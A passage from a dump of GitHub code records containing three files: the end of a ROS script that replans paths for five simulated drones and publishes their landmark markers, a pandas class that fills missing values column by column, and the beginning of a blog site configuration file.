data.header\n\tmarker.type = Marker.CYLINDER\n\tmarker.pose.position.x = workspace.landmark[key_id][0][0]\n\tmarker.pose.position.y = workspace.landmark[key_id][0][1]\n\tmarker.pose.position.z = 0.15\n\tmarker.pose.orientation = Quaternion(0,0,workspace.landmark['l1'][2][1][0],workspace.landmark['l1'][2][1][1])\n\tif lm_color==1:\n\t\tmarker.scale.x = 0.01\n\t\tmarker.scale.y = 0.01\n\t\tmarker.scale.z = 0.2\n\t\tmarker.color=ColorRGBA(0.013, 0.01, 0.9, 0.8)\n\telif lm_color==2:\n\t\tmarker.scale.x = 2\n\t\tmarker.scale.y = 2\n\t\tmarker.scale.z = 0.2\n\t\tmarker.color=ColorRGBA(0.013, 0.9, 0.01, 0.8)\n\telse:\n\t\tmarker.scale.x = 2\n\t\tmarker.scale.y = 2\n\t\tmarker.scale.z = 0.2\n\t\tmarker.color=ColorRGBA(0.9, 0.01, 0.01, 0.8)\n\tmarker.lifetime=rospy.Duration()\n\ndef show_all_landmarks(data):\n\tshow_landmark1(data,'l1', workspace.landmark['l1'][0], workspace.landmark['l1'][2],marker_1)\n\tmarker_pub_1.publish(marker_1)\n\tshow_landmark1(data,'l2', workspace.landmark['l2'][0], workspace.landmark['l2'][2],marker_2)\n\tmarker_pub_2.publish(marker_2)\n\tshow_landmark1(data,'l3', workspace.landmark['l3'][0], workspace.landmark['l3'][2],marker_3)\n\tmarker_pub_3.publish(marker_3)\n\tshow_landmark1(data,'l4', workspace.landmark['l4'][0], workspace.landmark['l4'][2],marker_4)\n\tmarker_pub_4.publish(marker_4)\n\tshow_landmark1(data,'l5', workspace.landmark['l5'][0], workspace.landmark['l5'][2],marker_5)\n\tmarker_pub_5.publish(marker_5)\n\tshow_landmark1(data,'l6', workspace.landmark['l6'][0], workspace.landmark['l6'][2],marker_6)\n\tmarker_pub_6.publish(marker_6)\n\tshow_landmark1(data,'l7', workspace.landmark['l7'][0], workspace.landmark['l7'][2],marker_7)\n\tmarker_pub_7.publish(marker_7)\n\tshow_landmark1(data,'l8', workspace.landmark['l8'][0], workspace.landmark['l8'][2],marker_8)\n\tmarker_pub_8.publish(marker_8)\n\tshow_landmark1(data,'l9', workspace.landmark['l9'][0], workspace.landmark['l9'][2],marker_9)\n\tmarker_pub_9.publish(marker_9)\n\tshow_landmark1(data,'l10', workspace.landmark['l10'][0], workspace.landmark['l10'][2],marker_10)\n\tmarker_pub_10.publish(marker_10)\n\tshow_landmark1(data,'l11', workspace.landmark['l11'][0], workspace.landmark['l11'][2],marker_11)\n\tmarker_pub_11.publish(marker_11)\n\tshow_landmark1(data,'l12', workspace.landmark['l12'][0], workspace.landmark['l12'][2],marker_12)\n\tmarker_pub_12.publish(marker_12)\n\tshow_landmark1(data,'l13', workspace.landmark['l13'][0], workspace.landmark['l13'][2],marker_13)\n\tmarker_pub_13.publish(marker_13)\n\tnumber_of_landmarks = 13\n\n\tif not isinstance(rob1_wp_id, int) and display_target_landmarks:\n\t\tif rob1_wp_id.data < len(all_robot_waypoints[0]):\n\t\t\tlm_color = get_lm_color(buchi_graph.edges[(all_robot_waypoints[0][rob1_wp_id.data][2:])], number_of_landmarks)\n\t\t\tshow_landmark_color(data,'l1',lm_marker_1,lm_color[0])\n\t\t\tlm_marker_pub_1.publish(lm_marker_1)\n\t\t\tshow_landmark_color(data,'l2',lm_marker_2,lm_color[1])\n\t\t\tlm_marker_pub_2.publish(lm_marker_2)\n\t\t\tshow_landmark_color(data,'l3',lm_marker_3,lm_color[2])\n\t\t\tlm_marker_pub_3.publish(lm_marker_3)\n\t\t\tshow_landmark_color(data,'l4',lm_marker_4,lm_color[3])\n\t\t\tlm_marker_pub_4.publish(lm_marker_4)\n\t\t\tshow_landmark_color(data,'l5',lm_marker_5,lm_color[4])\n\t\t\tlm_marker_pub_5.publish(lm_marker_5)\n\t\t\tshow_landmark_color(data,'l6',lm_marker_6,lm_color[5])\n\t\t\tlm_marker_pub_6.publish(lm_marker_6)\n\t\t\tshow_landmark_color(data,'l7',lm_marker_7,lm_color[6])\n\t\t\tlm_marker_pub_7.publish(lm_marker_7)\n\t\t\tshow_landmark_color(data,'l8',lm_marker_8,lm_color[7])\n\t\t\tlm_marker_pub_8.publish(lm_marker_8)\n\t\t\tshow_landmark_color(data,'l9',lm_marker_9,lm_color[8])\n\t\t\tlm_marker_pub_9.publish(lm_marker_9)\n\t\t\tshow_landmark_color(data,'l10',lm_marker_10,lm_color[9])\n\t\t\tlm_marker_pub_10.publish(lm_marker_10)\n\t\t\tshow_landmark_color(data,'l11',lm_marker_11,lm_color[10])\n\t\t\tlm_marker_pub_11.publish(lm_marker_11)\n\t\t\tshow_landmark_color(data,'l12',lm_marker_12,lm_color[11])\n\t\t\tlm_marker_pub_12.publish(lm_marker_12)\n\t\t\tshow_landmark_color(data,'l13',lm_marker_13,lm_color[12])\n\t\t\tlm_marker_pub_13.publish(lm_marker_13)\n\n# def show_landmark2(data,key_id,shape):\n# \tglobal marker_2 \n# \tmarker_2.header = data.header\n# \tmarker_2.type = Marker.CYLINDER\n# \tmarker_2.pose.position.x = workspace.landmark[key_id][0][0]\n# \tmarker_2.pose.position.y = workspace.landmark[key_id][0][1]\n# \tmarker_2.pose.position.z = 1\n# \tmarker_2.scale.x = 0.50\n# \tmarker_2.scale.y = 0.50\n# \tmarker_2.scale.z = 4\n# \tmarker_2.color=ColorRGBA(0.013, 0.01, 0.9, 0.8)\n# \tmarker_2.lifetime=rospy.Duration()\n# \tmarker_pub_2.publish(marker_2)\n\ndef publish_path_status(is_path_ready):\n\tpath_ready_pub1.publish(is_path_ready)\n\tpath_ready_pub2.publish(is_path_ready)\n\tpath_ready_pub3.publish(is_path_ready)\n\tpath_ready_pub4.publish(is_path_ready)\n\tpath_ready_pub5.publish(is_path_ready)\n\n\ndef get_curr_rob_states(wp_id):\n init=[]\n pos=[]\n for i in range(buchi.number_of_robots):\n pos.append(tuple(all_robot_waypoints[i][wp_id][:2]))\n init.append(tuple(pos))\n init.append(all_robot_waypoints[0][wp_id][2])\n return tuple(init)\n\n\ndef detect_in_vid1(data):\n\tglobal got_image_1\n\tgot_image_1 = True\n\ndef detect_in_vid2(data):\n\tglobal got_image_2\n\tgot_image_2 = True\n\ndef detect_in_vid3(data):\n\tglobal got_image_3\n\tgot_image_3 = True\n\t\ndef detect_in_vid4(data):\n\tglobal got_image_4\n\tgot_image_4 = True\n\t\ndef detect_in_vid5(data):\n\tglobal got_image_5\n\tgot_image_5 = True\n\n \ndef odom_cb1(data):\n\tglobal got_image_1\n\tglobal workspace\n\t# print(rob1_wp_id)\n\tglobal channel_open\n\t# print(\"channel status in 1:\", channel_open)\n\tif channel_open:\n\t\tchannel_open = False\n\t\tif got_image_1:\n\t\t\tnn_output = generate_nn_output(data)\n\t\t\tgot_image_1 = False\n\t\t\tupdate_landmark_estimates(nn_output)\n\t\t\tupdate_class_distribution(nn_output)\n\t\t\tshow_all_landmarks(data)\n\t\t\tif nn_output:\n\t\t\t\tglobal all_robot_waypoints\n\t\t\t\tglobal robot_wp_satsify_AP\n\t\t\t\t\n\t\t\t\tif rob1_wp_id.data < len(all_robot_waypoints[0]):\n\t\t\t\t\trob_waypoint = all_robot_waypoints[0][rob1_wp_id.data]\n\t\t\t\t\tnext_rob_waypoint = []\n\t\t\t\t\tfor i in range(buchi.number_of_robots):\n\t\t\t\t\t\tnext_rob_waypoint.append(all_robot_waypoints[i][rob1_wp_id.data+1:rob1_wp_id.data+10])\n\n\t\t\t\t\treplanning_bool = task.Replanning_check(rob_waypoint, next_rob_waypoint, workspace, robot_wp_satsify_AP, 1, buchi_graph)\n\t\t\t\t\tif replanning_bool:\n\t\t\t\t\t\tis_path_ready = False\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\t\t\t\t\n\t\t\t\t\t\tprint(\"\\n*\\n*\\nCalculating path\\n*\\n*\\n\")\n\t\t\t\t\t\tinit_state = get_curr_rob_states(rob1_wp_id.data)\n\t\t\t\t\t\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=False, save_covariances = False)\n\t\t\t\t\t\tprint(\"\\n Calculated path from cb 1\\n\")\n\n\t\t\t\t\t\tprint(\"\\n set path ready true\\n\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tis_path_ready = True\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\tchannel_open = True\n\t\t# print(\"exit channel operation 1\")\n\n\n\n\n# 2\ndef odom_cb2(data):\n\tglobal got_image_2\n\tglobal channel_open\n\t# print(\"channel status in 2:\", channel_open)\n\tif channel_open:\n\t\tchannel_open = False\n\t\tif got_image_2:\t\n\t\t\tnn_output = generate_nn_output(data)\n\t\t\tgot_image_2 = False\n\t\t\tupdate_landmark_estimates(nn_output)\n\t\t\tupdate_class_distribution(nn_output)\n\t\t\tshow_all_landmarks(data)\n\t\t\tif nn_output:\n\t\t\t\tglobal all_robot_waypoints\n\t\t\t\tglobal robot_wp_satsify_AP\n\t\t\t\t\n\t\t\t\tif rob2_wp_id.data < len(all_robot_waypoints[0]):\n\t\t\t\t\trob_waypoint = all_robot_waypoints[0][rob2_wp_id.data]\n\t\t\t\t\tnext_rob_waypoint = []\n\t\t\t\t\tfor i in range(buchi.number_of_robots):\n\t\t\t\t\t\tnext_rob_waypoint.append(all_robot_waypoints[i][rob2_wp_id.data+1:rob2_wp_id.data+10])\n\t\t\t\t\treplanning_bool = task.Replanning_check(rob_waypoint, next_rob_waypoint, workspace, robot_wp_satsify_AP, 2, buchi_graph)\n\t\t\t\t\tif replanning_bool:\n\t\t\t\t\t\tis_path_ready = False\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\t\t\t\t\n\t\t\t\t\t\tprint(\"\\n*\\n*\\nCalculating path\\n*\\n*\\n\")\n\t\t\t\t\t\tinit_state = get_curr_rob_states(rob2_wp_id.data)\n\t\t\t\t\t\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=False, save_covariances = False)\n\t\t\t\t\t\tprint(\"\\n Calculated path from cb 2\\n\")\n\n\t\t\t\t\t\tprint(\"\\n set path ready true\\n\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tis_path_ready = True\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\tchannel_open = True\n\t\t# print(\"exit channel operation 2\")\n\n\n# 3\ndef odom_cb3(data):\n\tglobal got_image_3\n\tglobal channel_open\n\t# print(\"channel status in 3:\", channel_open)\n\tif channel_open:\n\t\tchannel_open = False\n\t\tif got_image_3:\n\t\t\tnn_output = generate_nn_output(data)\n\t\t\tgot_image_3 = False\n\t\t\tupdate_landmark_estimates(nn_output)\n\t\t\tupdate_class_distribution(nn_output)\n\t\t\tshow_all_landmarks(data)\n\t\t\tif nn_output:\n\t\t\t\tglobal all_robot_waypoints\n\t\t\t\tglobal robot_wp_satsify_AP\n\t\t\t\t\n\t\t\t\tif rob3_wp_id.data < len(all_robot_waypoints[0]):\n\t\t\t\t\trob_waypoint = all_robot_waypoints[0][rob3_wp_id.data]\n\t\t\t\t\tnext_rob_waypoint = []\n\t\t\t\t\tfor i in range(buchi.number_of_robots):\n\t\t\t\t\t\tnext_rob_waypoint.append(all_robot_waypoints[i][rob3_wp_id.data+1:rob3_wp_id.data+10])\n\t\t\t\t\n\t\t\t\t\treplanning_bool = task.Replanning_check(rob_waypoint, next_rob_waypoint, workspace, robot_wp_satsify_AP, 3, buchi_graph)\n\t\t\t\t\tif replanning_bool:\n\t\t\t\t\t\tis_path_ready = False\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\t\t\t\t\n\t\t\t\t\t\tprint(\"\\n*\\n*\\nCalculating path\\n*\\n*\\n\")\n\t\t\t\t\t\tinit_state = get_curr_rob_states(rob3_wp_id.data)\n\t\t\t\t\t\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=False, save_covariances = False)\n\t\t\t\t\t\tprint(\"\\n Calculated path from cb 3\\n\")\n\n\t\t\t\t\t\tprint(\"\\n set path ready true\\n\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tis_path_ready = True\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\tchannel_open = True\n\t\t# print(\"exit channel operation 3\")\n\n# 4\ndef odom_cb4(data):\n\tglobal got_image_4\n\tglobal channel_open\n\t# print(\"channel status in 4:\", channel_open)\n\tif channel_open:\n\t\tchannel_open = False\n\t\tif got_image_4:\n\t\t\tnn_output = generate_nn_output(data)\n\t\t\tgot_image_4 = False\n\t\t\tupdate_landmark_estimates(nn_output)\n\t\t\tupdate_class_distribution(nn_output)\n\t\t\tshow_all_landmarks(data)\n\t\t\tif nn_output:\n\t\t\t\tglobal all_robot_waypoints\n\t\t\t\tglobal robot_wp_satsify_AP\n\t\t\t\t\n\t\t\t\tif rob4_wp_id.data < len(all_robot_waypoints[0]):\n\t\t\t\t\trob_waypoint = all_robot_waypoints[0][rob4_wp_id.data]\n\t\t\t\t\tnext_rob_waypoint = []\n\t\t\t\t\tfor i in range(buchi.number_of_robots):\n\t\t\t\t\t\tnext_rob_waypoint.append(all_robot_waypoints[i][rob4_wp_id.data+1:rob4_wp_id.data+10])\n\t\t\t\t\t\n\t\t\t\t\treplanning_bool = task.Replanning_check(rob_waypoint, next_rob_waypoint, workspace, robot_wp_satsify_AP, 4, buchi_graph)\n\t\t\t\t\tif replanning_bool:\n\t\t\t\t\t\tis_path_ready = False\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\t\t\t\t\n\t\t\t\t\t\tprint(\"\\n*\\n*\\nCalculating path\\n*\\n*\\n\")\n\t\t\t\t\t\tinit_state = get_curr_rob_states(rob4_wp_id.data)\n\t\t\t\t\t\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=False, save_covariances = False)\n\t\t\t\t\t\tprint(\"\\n Calculated path from cb 4\\n\")\n\n\t\t\t\t\t\tprint(\"\\n set path ready true\\n\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tis_path_ready = True\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\tchannel_open = True\n\t\t# print(\"exit channel operation 4\")\n\n# 5\ndef odom_cb5(data):\n\tglobal got_image_5\n\tglobal channel_open\n\t# print(\"channel status in 5:\", channel_open)\n\tif channel_open:\n\t\tchannel_open = False\n\t\tif got_image_5:\t\n\t\t\tnn_output = generate_nn_output(data)\n\t\t\tgot_image_5 = False\n\t\t\tupdate_landmark_estimates(nn_output)\n\t\t\tupdate_class_distribution(nn_output)\n\t\t\tshow_all_landmarks(data)\n\t\t\tif nn_output:\n\t\t\t\tglobal all_robot_waypoints\n\t\t\t\tglobal robot_wp_satsify_AP\n\t\t\t\t\n\t\t\t\tif rob5_wp_id.data < len(all_robot_waypoints[0]):\n\t\t\t\t\trob_waypoint = all_robot_waypoints[0][rob5_wp_id.data]\n\t\t\t\t\tnext_rob_waypoint = []\n\t\t\t\t\tfor i in range(buchi.number_of_robots):\n\t\t\t\t\t\tnext_rob_waypoint.append(all_robot_waypoints[i][rob5_wp_id.data+1:rob5_wp_id.data+10])\n\t\t\t\t\t\n\t\t\t\t\treplanning_bool = task.Replanning_check(rob_waypoint, next_rob_waypoint, workspace, robot_wp_satsify_AP, 5, buchi_graph)\n\t\t\t\t\tif replanning_bool:\n\t\t\t\t\t\tis_path_ready = False\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\t\t\t\t\n\t\t\t\t\t\tprint(\"\\n*\\n*\\nCalculating path\\n*\\n*\\n\")\n\t\t\t\t\t\tinit_state = get_curr_rob_states(rob5_wp_id.data)\n\t\t\t\t\t\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=False, save_covariances = False)\n\t\t\t\t\t\tprint(\"\\n Calculated path from cb 5\\n\")\n\n\t\t\t\t\t\tprint(\"\\n set path ready true\\n\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tis_path_ready = True\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\tchannel_open = True\n\t\t# print(\"exit channel operation 5\")\n\n\n\ndef wp_id_cb1(data):\n\tglobal rob1_wp_id\n\trob1_wp_id = data\n\t# print(\"firefly 1: \",rob1_wp_id.data)\n\ndef wp_id_cb2(data):\n\tglobal rob2_wp_id\n\trob2_wp_id = data\n\t# print(\"firefly 2: \",rob2_wp_id.data)\n\ndef wp_id_cb3(data):\n\tglobal rob3_wp_id\n\trob3_wp_id = data\n\t# print(\"firefly 3: \",rob3_wp_id.data)\t\n\ndef wp_id_cb4(data):\n\tglobal rob4_wp_id\n\trob4_wp_id = data\n\t# print(\"firefly 4: \",rob4_wp_id.data)\n\ndef wp_id_cb5(data):\n\tglobal rob5_wp_id\n\trob5_wp_id = data\n\t# print(\"firefly 5: \",rob5_wp_id.data)\n\n\n\n\n\n\nif __name__==\"__main__\":\n\tprint(\"testing workflow 3\")\n\n\n\trospy.init_node('neural_network', anonymous=True)\n\n\tpath_ready_pub1 = rospy.Publisher('/firefly1/path_ready', Bool, queue_size=10)\n\tpath_ready_pub2 = rospy.Publisher('/firefly2/path_ready', Bool, queue_size=10)\n\tpath_ready_pub3 = rospy.Publisher('/firefly3/path_ready', Bool, queue_size=10)\n\tpath_ready_pub4 = rospy.Publisher('/firefly4/path_ready', Bool, queue_size=10)\n\tpath_ready_pub5 = rospy.Publisher('/firefly5/path_ready', Bool, queue_size=10)\n\tis_path_ready = False\n\t# path_ready_pub1.publish(is_path_ready)\n\t# path_ready_pub2.publish(is_path_ready)\n\t# path_ready_pub3.publish(is_path_ready)\n\t# path_ready_pub4.publish(is_path_ready)\n\t# path_ready_pub5.publish(is_path_ready)\n\tpublish_path_status(is_path_ready)\n\n\n\tinit_state = (task.init, buchi_graph.graph['init'][0])\n\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=True, save_covariances = False)\n\n\t# marker_pub_1 = rospy.Publisher('/target1/cov/visualization_marker', Marker, queue_size = 10)\n\t# marker_pub_2 = rospy.Publisher('/target1/cov/visualization_marker', Marker, queue_size = 10)\n\t# marker_pub_3 = rospy.Publisher('/firefly3/camera/visualization_marker', Marker, queue_size = 10)\n\t# marker_pub_4 = rospy.Publisher('/firefly4/camera/visualization_marker', Marker, queue_size = 10)\n\t# marker_pub_5 = rospy.Publisher('/firefly5/camera/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_1 = rospy.Publisher('/target1/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_2 = rospy.Publisher('/target2/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_3 = rospy.Publisher('/target3/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_4 = rospy.Publisher('/target4/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_5 = rospy.Publisher('/target5/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_6 = rospy.Publisher('/target6/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_7 = rospy.Publisher('/target7/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_8 = rospy.Publisher('/target8/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_9 = rospy.Publisher('/target9/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_10 = rospy.Publisher('/target10/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_11 = rospy.Publisher('/target11/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_12 = rospy.Publisher('/target12/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_13 = rospy.Publisher('/target13/cov/visualization_marker', Marker, queue_size = 10)\n\n\tlm_marker_pub_1 = rospy.Publisher('/target1/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_2 = rospy.Publisher('/target2/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_3 = rospy.Publisher('/target3/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_4 = rospy.Publisher('/target4/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_5 = rospy.Publisher('/target5/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_6 = rospy.Publisher('/target6/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_7 = rospy.Publisher('/target7/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_8 = rospy.Publisher('/target8/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_9 = rospy.Publisher('/target9/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_10 = rospy.Publisher('/target10/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_11 = rospy.Publisher('/target11/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_12 = rospy.Publisher('/target12/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_13 = rospy.Publisher('/target13/state/visualization_marker', Marker, queue_size = 10)\t\n\n\n\tvid_sub_1 = rospy.Subscriber(\"/firefly1/vi_sensor/left/image_raw\", Image, detect_in_vid1, queue_size = 1)\n\tvid_sub_2 = rospy.Subscriber(\"/firefly2/vi_sensor/left/image_raw\", Image, detect_in_vid2, queue_size = 1)\n\tvid_sub_3 = rospy.Subscriber(\"/firefly3/vi_sensor/left/image_raw\", Image, detect_in_vid3, queue_size = 1)\n\tvid_sub_4 = rospy.Subscriber(\"/firefly4/vi_sensor/left/image_raw\", Image, detect_in_vid4, queue_size = 1)\n\tvid_sub_5 = rospy.Subscriber(\"/firefly5/vi_sensor/left/image_raw\", Image, detect_in_vid5, queue_size = 1)\n\n\todom_sub_1 = rospy.Subscriber(\"/firefly1/odometry_sensor1/odometry\", Odometry, odom_cb1, queue_size = 1)\n\todom_sub_2 = rospy.Subscriber(\"/firefly2/odometry_sensor1/odometry\", Odometry, odom_cb2, queue_size = 1)\n\todom_sub_3 = rospy.Subscriber(\"/firefly3/odometry_sensor1/odometry\", Odometry, odom_cb3, queue_size = 1)\n\todom_sub_4 = rospy.Subscriber(\"/firefly4/odometry_sensor1/odometry\", Odometry, odom_cb4, queue_size = 1)\n\todom_sub_5 = rospy.Subscriber(\"/firefly5/odometry_sensor1/odometry\", Odometry, odom_cb5, queue_size = 1)\n\n\twp_id_sub_1 = rospy.Subscriber(\"/firefly1/current_waypoint_id\", Int32, wp_id_cb1, queue_size = 1)\n\twp_id_sub_2 = rospy.Subscriber(\"/firefly2/current_waypoint_id\", Int32, wp_id_cb2, queue_size = 1)\n\twp_id_sub_3 = rospy.Subscriber(\"/firefly3/current_waypoint_id\", Int32, wp_id_cb3, queue_size = 1)\n\twp_id_sub_4 = rospy.Subscriber(\"/firefly4/current_waypoint_id\", Int32, wp_id_cb4, queue_size = 1)\n\twp_id_sub_5 = rospy.Subscriber(\"/firefly5/current_waypoint_id\", Int32, wp_id_cb5, queue_size = 1)\n\n\n\tprint(\"x\\nx\\nx\\nx\\nx\\nx\\nx\\nIn nn sim \\nx\\nx\\nx\\nx\\nx\\nx\\nx\\n\")\n\t# d = rospy.Duration(3, 0)\n\t# rospy.sleep(d)\n\tprint(\"x\\nx\\nx\\nx\\nx 30 sec sleep done \\nx\\nx\\nx\\n\")\n\t\n\n\tis_path_ready = True\n\t# path_ready_pub1.publish(is_path_ready)\n\t# path_ready_pub2.publish(is_path_ready)\n\t# path_ready_pub3.publish(is_path_ready)\n\t# path_ready_pub4.publish(is_path_ready)\n\t# path_ready_pub5.publish(is_path_ready)\n\tpublish_path_status(is_path_ready)\n\n\n\n\n\n\n\n\trospy.spin()\n","repo_name":"samarth-kalluraya/SafePlan_simulation","sub_path":"rotors_simulator/rotors_gazebo/scripts/online_planner.py","file_name":"online_planner.py","file_ext":"py","file_size_in_byte":23513,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"37750269855","text":"\"\"\"Custom imputer to replace values within pandas dataframe columns with config-specified imputation schemes\n\nAuthor(s):\n Reka Daniel-Weiner (reka.danielweiner@weightwatchers.com)\n\n Carl Anderson (carl.anderson@weightwatchers.com)\n\n\"\"\"\nimport pandas as pd\nimport logging\nfrom primrose.base.transformer import AbstractTransformer\n\n\nclass ColumnSpecificImpute(AbstractTransformer):\n \"\"\"Transform config specified columns NULL values into zero, mean, median, mode, inf or negative inf\"\"\"\n\n def __init__(\n self,\n columns_to_zero,\n columns_to_mean,\n columns_to_median,\n columns_to_mode,\n columns_to_infinity,\n columns_to_neg_infinity,\n ):\n \"\"\"Transform config specified columns NULL values into zero, mean, median, mode, inf or negative inf\n\n Args:\n columns_to_zero (list): list of columns to impute zeros\n columns_to_mean (list): list of columns to impute means\n columns_to_median (list): list of columns to impute medians\n columns_to_mode (list): list of columns to impute modes\n columns_to_infinity (list): list of columns to impute to large value (999999999)\n columns_to_neg_infinity (list): list of columns to impute to large negative value (-999999999)\n\n Returns:\n nothing. Side effect to set list of columns to set to mean, 0, median etc\n\n \"\"\"\n self.columns_to_zero = columns_to_zero\n self.columns_to_mean = columns_to_mean\n self.columns_to_median = columns_to_median\n self.columns_to_mode = columns_to_mode\n self.columns_to_infinity = columns_to_infinity\n self.columns_to_neg_infinity = columns_to_neg_infinity\n self.encoder = None\n\n def fit(self, data):\n \"\"\"Fit encoder imputation values to dataframe metrics\n Create a dictionary of column name to imputed values. These values might be straight constants or might\n be a function of the complete column's value, such as mode or median\n\n Args:\n data (pandas data frame): a data frame\n\n Returns:\n Nothing. Updates internal dictionary of column name to imputed value\n\n Raises:\n Exception if a column appears in multiple lists, or if column not recognized\n\n \"\"\"\n\n self.encoder = {}\n columns_so_far = set()\n\n for cols in [\n self.columns_to_zero,\n self.columns_to_mean,\n self.columns_to_median,\n self.columns_to_mode,\n self.columns_to_infinity,\n self.columns_to_neg_infinity,\n ]:\n\n # does column exist?\n for col in cols:\n if not col in data.columns:\n raise Exception(\"Unrecognized impute column '\" + str(col) + \"'\")\n\n # is it in some previous list?\n in_common = columns_so_far.intersection(set(cols))\n if in_common:\n raise Exception(\"There are columns in multiple lists \" + str(in_common))\n columns_so_far = columns_so_far.union(set(cols))\n\n logging.info(\"Specifying columns to impute 0\")\n [self.encoder.setdefault(col, 0) for col in self.columns_to_zero]\n\n logging.info(\"Specifying columns to impute median\")\n [\n self.encoder.setdefault(col, data[col].median())\n for col in self.columns_to_median\n ]\n\n logging.info(\"Specifying columns to impute mean\")\n [self.encoder.setdefault(col, data[col].mean()) for col in self.columns_to_mean]\n\n logging.info(\"Specifying columns to impute large values\")\n [self.encoder.setdefault(col, 999999999.0) for col in self.columns_to_infinity]\n\n logging.info(\"Specifying columns to impute large negative values\")\n [\n self.encoder.setdefault(col, -999999999.0)\n for col in self.columns_to_neg_infinity\n ]\n\n logging.info(\"Specifying columns to impute mode\")\n for col in self.columns_to_mode:\n logging.info(\"imputing {}\".format(col))\n try:\n if pd.notnull(data[col].mode().values[0]):\n col_mode = data[col].mode().values[0]\n else:\n col_mode = 0\n except Exception:\n col_mode = 0\n\n self.encoder[col] = col_mode\n\n def transform(self, data):\n \"\"\"Impute columns in data according to the imputations fit by self.fit\n\n Args:\n data (dataframe)\n\n Returns:\n data (dataframe)\n\n Raises:\n Exception if train is not called before transfoorm\n\n \"\"\"\n\n if self.encoder is None:\n raise Exception(\n \"ColumnSpecificImpute must train imputations with fit before calling transform.\"\n )\n\n for col, val in self.encoder.items():\n data[col] = data[col].fillna(val)\n\n return data\n","repo_name":"ww-tech/primrose","sub_path":"primrose/transformers/impute.py","file_name":"impute.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"}
+{"seq_id":"34763409525","text":"# -*- coding: utf-8 -*-\r\n\"\"\"博客构建配置文件\r\n\"\"\"\r\n\r\n# For Maverick\r\nsite_prefix = \"/\"\r\nsource_dir = \"../src/\"\r\nbuild_dir = \"../dist/\"\r\nindex_page_size = 10\r\narchives_page_size = 20\r\nenable_jsdelivr = {\r\n \"enabled\": True,\r\n \"repo\": \"stormycloudy/stormycloudy.github.io@master\"\r\n}\r\n\r\n# 站点设置\r\nsite_name = \"Stormycloudy\"\r\nsite_logo = \"${site_prefix}logo.png\"\r\nsite_build_date = \"2019-12-31T15:10-05:00\"\r\nauthor = \"Shay L\"\r\nemail = \"xuecliu@iu.edu\"\r\nauthor_homepage = \"http://pages.iu.edu/~xuecliu\"\r\ndescription = \"Life is good.\"\r\nkey_words = ['ShayLiu', 'stormycloudy', 'atmosphericscience', 'blog']\r\nlanguage = 'en'\r\nexternal_links = [\r\n {\r\n \"name\": \"Shay Liu's research\",\r\n \"url\": \"https://xuecliu.pages.iu.edu/\",\r\n \"brief\": \"My research website on IU pages.\"\r\n }\r\n]\r\nnav = [\r\n {\r\n \"name\": \"Home\",\r\n \"url\": \"${site_prefix}\",\r\n \"target\": \"_self\"\r\n },\r\n {\r\n \"name\": \"Archived\",\r\n \"url\": \"${site_prefix}archives/\",\r\n \"target\": \"_self\"\r\n },\r\n {\r\n \"name\": \"About\",\r\n \"url\": \"${site_prefix}about/\",\r\n \"target\": \"_self\"\r\n }\r\n]\r\n\r\nsocial_links = [\r\n {\r\n \"name\": \" Twitter\",\r\n \"url\": \"https://twitter.com/baroclinicat\",\r\n \"icon\": \"fab fa-twitter\"\r\n },\r\n {\r\n \"name\": \" GitHub\",\r\n \"url\": 